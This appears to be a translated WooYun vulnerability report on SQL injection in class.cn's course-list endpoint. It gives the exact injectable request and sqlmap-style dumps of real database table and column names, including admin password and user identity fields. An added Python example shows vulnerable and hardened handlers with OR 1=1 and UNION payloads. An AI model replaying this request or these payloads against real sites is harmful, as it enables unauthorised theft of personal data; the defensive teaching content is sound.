WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
2015-07-02: details reported to the vendor, awaiting vendor handling
2015-07-07: the vendor has actively ignored the vulnerability; details disclosed to the public
好课网 (class.cn) is the online learning platform of China Education Online (中国教育在线). It offers learners a large catalogue of quality online courses spanning basic education, higher education and vocational training, brings together professionals from every industry, and lets you freely pick whatever you need or find interesting..
Injection point

POST /ajax/course/list_course HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.class.cn:80/
Host: www.class.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

all_course=1&sort=publishtime-desc&tags[0]=1*&type_id=19

The `*` after `tags[0]=1` is sqlmap's custom injection marker (as used in a request file passed with `-r`), not part of the real parameter value: the injectable parameter is the PHP-style array element `tags[0]`, which the server evidently concatenates into its SQL rather than binding.
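The report shows only the request and the sqlmap dump, not the server-side query. The following is an added example, not code from class.cn or from this report: a hypothetical handler that builds an `IN (...)` list from the `tags[...]` array the way the injection point behaves, beside a hardened version that validates each element and binds one placeholder per value. The `ci_sessions` table in the dump suggests a CodeIgniter (PHP) backend, but since the real code is unknown the stand-in is Python with an in-memory SQLite database; the schema and rows are constructed (table names borrowed from the dump, data invented), and the `sqlite_master` enumeration stands in for the `information_schema` queries sqlmap would run against MySQL.

```python
"""Added example: array-parameter SQL injection in a list_course-style handler,
reproduced against a constructed in-memory SQLite schema (not the site's code or data)."""
import sqlite3
from urllib.parse import parse_qs, urlencode

SORT_COLUMNS = {"publishtime", "title"}   # ORDER BY cannot be bound as a parameter: whitelist it
SORT_DIRECTIONS = {"asc", "desc"}


def make_db() -> sqlite3.Connection:
    """Constructed sample schema; table names mirror the dump, the rows are invented."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE class_course_list (course_id INTEGER PRIMARY KEY, title TEXT, publishtime INTEGER);
        CREATE TABLE class_tag_course  (tag_id INTEGER, course_id INTEGER);
        INSERT INTO class_course_list VALUES (1, 'Algebra', 100), (2, 'Physics', 200), (3, 'History', 300);
        INSERT INTO class_tag_course  VALUES (1, 1), (1, 2), (2, 3);
    """)
    return conn


def parse_body(body: str) -> dict:
    """Decode an x-www-form-urlencoded body; PHP-style tags[0], tags[1], ... become one list."""
    fields = parse_qs(body, keep_blank_values=True)
    tags = [v[0] for k, v in sorted(fields.items()) if k.startswith("tags[")]
    col, _, direction = fields.get("sort", ["publishtime-desc"])[0].partition("-")
    if col not in SORT_COLUMNS or direction not in SORT_DIRECTIONS:
        raise ValueError("unsupported sort")
    return {"tags": tags, "col": col, "dir": direction}


def list_course_vulnerable(conn: sqlite3.Connection, body: str) -> list:
    """Hypothetical vulnerable handler: tag values are concatenated straight into IN (...)."""
    p = parse_body(body)
    sql = ("SELECT c.course_id, c.title FROM class_course_list c "
           "JOIN class_tag_course t ON t.course_id = c.course_id "
           f"WHERE t.tag_id IN ({','.join(p['tags'])}) "
           f"ORDER BY c.{p['col']} {p['dir']}")
    return [row[0] for row in conn.execute(sql)]


def list_course_safe(conn: sqlite3.Connection, body: str) -> list:
    """Hardened handler: every tag must be an integer, and each one gets its own bound placeholder."""
    p = parse_body(body)
    if not all(t.isdigit() for t in p["tags"]):
        raise ValueError("tag ids must be integers")
    tags = [int(t) for t in p["tags"]]
    if not tags:
        return []
    placeholders = ",".join("?" for _ in tags)
    sql = ("SELECT c.course_id, c.title FROM class_course_list c "
           "JOIN class_tag_course t ON t.course_id = c.course_id "
           f"WHERE t.tag_id IN ({placeholders}) "
           f"ORDER BY c.{p['col']} {p['dir']}")
    return [row[0] for row in conn.execute(sql, tags)]


def demo() -> dict:
    """Run a legitimate request and two payloads through both handlers; returns the results."""
    conn = make_db()
    normal = urlencode({"all_course": "1", "sort": "publishtime-desc", "tags[0]": "2", "type_id": "19"})
    # Closes the IN list and makes the WHERE clause always true; '--' comments out the ORDER BY.
    or_true = urlencode({"sort": "publishtime-desc", "tags[0]": "2) OR 1=1 --"})
    # UNION payload enumerating table names, the SQLite analogue of what sqlmap did here.
    union = urlencode({"sort": "publishtime-desc",
                       "tags[0]": "0) UNION SELECT name, 0 FROM sqlite_master WHERE type='table' --"})
    results = {
        "normal_vulnerable": list_course_vulnerable(conn, normal),
        "normal_safe": list_course_safe(conn, normal),
        "or_true_vulnerable": sorted(list_course_vulnerable(conn, or_true)),
        "union_vulnerable": sorted(list_course_vulnerable(conn, union)),
    }
    try:
        list_course_safe(conn, union)
        results["safe_rejects_payload"] = False
    except ValueError:
        results["safe_rejects_payload"] = True
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The legitimate request returns the same course from both handlers; the `OR 1=1` body makes the vulnerable handler return every tagged course, and the UNION body makes it return table names instead of course ids, while the hardened handler rejects both before any SQL runs. The whitelist on `sort` is there because `publishtime-desc` is also interpolated into the query and `ORDER BY` cannot be parameterised.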
Exposes 500,000+ teacher and student records (names, mobile numbers, national ID numbers, student orders), and also the main site's data.

Main-site data
Database: eol_study2
[88 tables]
Study_Aboutfile
Study_Admin_Manage
Study_Coupon_Code
Study_Coupon_List
Study_Coupon_User_List
Study_Coupon_log
Study_Course
Study_CourseTmp
Study_Course_Check_Log
Study_Course_Comment
Study_Course_DelFile_Log
Study_Course_Live
Study_Course_LiveTmp
Study_Course_Note
Study_Course_Num
Study_Course_Scale
Study_Course_Section
Study_Course_SectionTmp
Study_Course_SectionTmp_Log
Study_Course_Section_Aboutfile
Study_Course_Section_Log
Study_Course_Section_Teacher
Study_Course_Section_Video
Study_Course_Section_VideoTmp
Study_Course_Section_VideoTmp_Log
Study_Course_Section_Video_Delete
Study_Course_Section_Video_Log
Study_Course_Total_Scale
Study_Course_Type
Study_Email_Send
Study_Interest
Study_Live_Callback_Log
Study_Live_Message_Log
Study_Live_Order_Log
Study_Message
Study_Message_Send
Study_My_Collect_Course
Study_My_Study_Course
Study_Open_Uid_Map
Study_Order
Study_Order_Audit_Log
Study_Order_Haoxue
Study_Order_Log
Study_Order_Log_Dezhi
Study_Order_Pay_Log
Study_Stat_AboutFile
Study_Stat_CourseHits
Study_Stat_CourseScales
Study_Stat_Course_Day
Study_Stat_Course_Month
Study_Stat_Course_Week
Study_Stat_File_Day
Study_Stat_File_Month
Study_Stat_File_Week
Study_Stat_Keywords
Study_Stat_Keywords_Day
Study_Stat_Keywords_Month
Study_Stat_Keywords_Search
Study_Stat_Keywords_Week
Study_Stat_UserComments
Study_Stat_UserHits
Study_Stat_User_Day
Study_Stat_User_Month
Study_Stat_User_Week
Study_Teacher
Study_User
Study_User_Check_Log
Study_User_Comment_Log
Study_User_Comment_Viewtime
Study_User_Interest_lk
Study_User_Msg
Study_User_Num
Study_User_Organization_Apply
Study_User_Organization_Applytmp
Study_User_Pay_Apply
Study_User_Pay_Applytmp
Study_User_Person_Apply
Study_User_Person_Applytmp
Study_User_Rakeback_Set
Study_User_Weibo
Study_Void_Generator
ci_sessions
class_active
class_cart
class_tag_course
class_tag_course_type
class_tag_list
daemon
Database: eol_study2
Table: Study_Admin_Manage
[8 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| Id        | int(11)     |
| LastIp    | varchar(20) |
| LastLogin | datetime    |
| LoginNum  | int(11)     |
| Name      | varchar(20) |
| PassWord  | varchar(50) |
| Status    | tinyint(4)  |
| Suser     | tinyint(4)  |
+-----------+-------------+
500,000+ teacher and student records
Database: class_cn
[94 tables]
ci_sessions
class_active
class_admin_function
class_admin_group
class_admin_group_function
class_admin_member
class_admin_member_function
class_app_course_type
class_app_feedback
class_app_version
class_cart
class_ccback_section_filename
class_cooperation_order
class_coupon_list
class_coupon_op_log
class_coupon_public_code
class_coupon_single_code
class_coupon_user_list
class_course_amount
class_course_cc_video_undel
class_course_chapter
class_course_chapter_section
class_course_check
class_course_comment
class_course_detail
class_course_guide_doc
class_course_list
class_course_note
class_course_rate
class_course_rate_detail
class_course_section
class_course_section_check
class_course_section_guide_doc
class_course_section_multi
class_course_section_teacher
class_course_type
class_course_user_recommend
class_email_send
class_live_course
class_live_course_check
class_live_order
class_logs_coupon
class_logs_course_chapter_section_del
class_logs_course_check
class_logs_course_delfile
class_logs_course_section
class_logs_course_section_check_del
class_logs_course_section_multi_del
class_logs_course_update
class_logs_live_callback
class_logs_live_course
class_logs_live_course_del
class_logs_live_message
class_logs_order_charge_back
class_logs_order_check
class_logs_protocal_change
class_logs_transcoder
class_logs_user_change
class_logs_user_check
class_message
class_message_send
class_offline_protocol
class_open_uid_map
class_order
class_order_dezhi
class_order_haoxue
class_order_log
class_order_pay_log
class_promote_course
class_promote_course_check
class_promote_list
class_statistic_total
class_tag_course
class_tag_course_type
class_tag_list
class_user
class_user_comment
class_user_comment_viewtimes
class_user_favorites_course
class_user_msg
class_user_num
class_user_org_cert
class_user_org_cert_check
class_user_pay_request
class_user_pay_request_check
class_user_person_cert
class_user_person_cert_check
class_user_ratio_set
class_user_settle
class_user_settle_order
class_user_study_course
class_user_teacher
class_user_weibo
class_void_generator
Order details
Database: class_cn
Table: class_order
[19 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| back_time      | datetime            |
| close_pay      | decimal(10,2)       |
| close_status   | tinyint(2) unsigned |
| close_time     | datetime            |
| course_id      | int(11) unsigned    |
| create_time    | timestamp           |
| create_user_id | int(11) unsigned    |
| due_pay        | decimal(10,2)       |
| expend_type    | tinyint(4) unsigned |
| ip             | char(15)            |
| is_back        | tinyint(2) unsigned |
| oid            | char(16)            |
| order_status   | tinyint(2) unsigned |
| order_user_id  | int(11) unsigned    |
| pay            | decimal(10,2)       |
| pay_flag       | tinyint(3) unsigned |
| pay_time       | datetime            |
| source         | tinyint(1) unsigned |
| void           | bigint(20)          |
+----------------+---------------------+
User information
Database: class_cn
Table: class_user
[34 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| bad_comment    | int(11) unsigned    |
| contact_email  | varchar(50)         |
| create_time    | timestamp           |
| email          | varchar(100)        |
| gender         | enum('0','1','2')   |
| good_comment   | int(11) unsigned    |
| head_img       | varchar(200)        |
| interest       | varchar(1000)       |
| intro          | text                |
| is_check       | tinyint(2)          |
| is_pub_email   | tinyint(2)          |
| is_pub_mobile  | tinyint(2)          |
| is_pub_qq      | tinyint(2)          |
| is_pub_tel     | tinyint(2)          |
| is_pub_website | tinyint(2)          |
| is_pub_weibo   | tinyint(2)          |
| login_ip       | varchar(20)         |
| login_num      | int(11)             |
| login_time     | datetime            |
| mobile         | char(11)            |
| nick_name      | varchar(100)        |
| old_head_img   | varchar(100)        |
| pay_status     | tinyint(2) unsigned |
| qq             | varchar(20)         |
| rand_code      | varchar(32)         |
| real_name      | varchar(50)         |
| source         | varchar(10)         |
| status         | tinyint(2)          |
| tel            | varchar(20)         |
| up_time        | datetime            |
| user_id        | int(11)             |
| user_type      | tinyint(2)          |
| website        | varchar(200)        |
| weibo          | varchar(100)        |
+----------------+---------------------+
Fix suggestion: don't know.
Severity: no impact (ignored by vendor)
Ignored at: 2015-07-07 10:02
Vulnerability Rank: 15 (WooYun rating)
2015-07-07: Thanks for the check, we will fix it as soon as possible.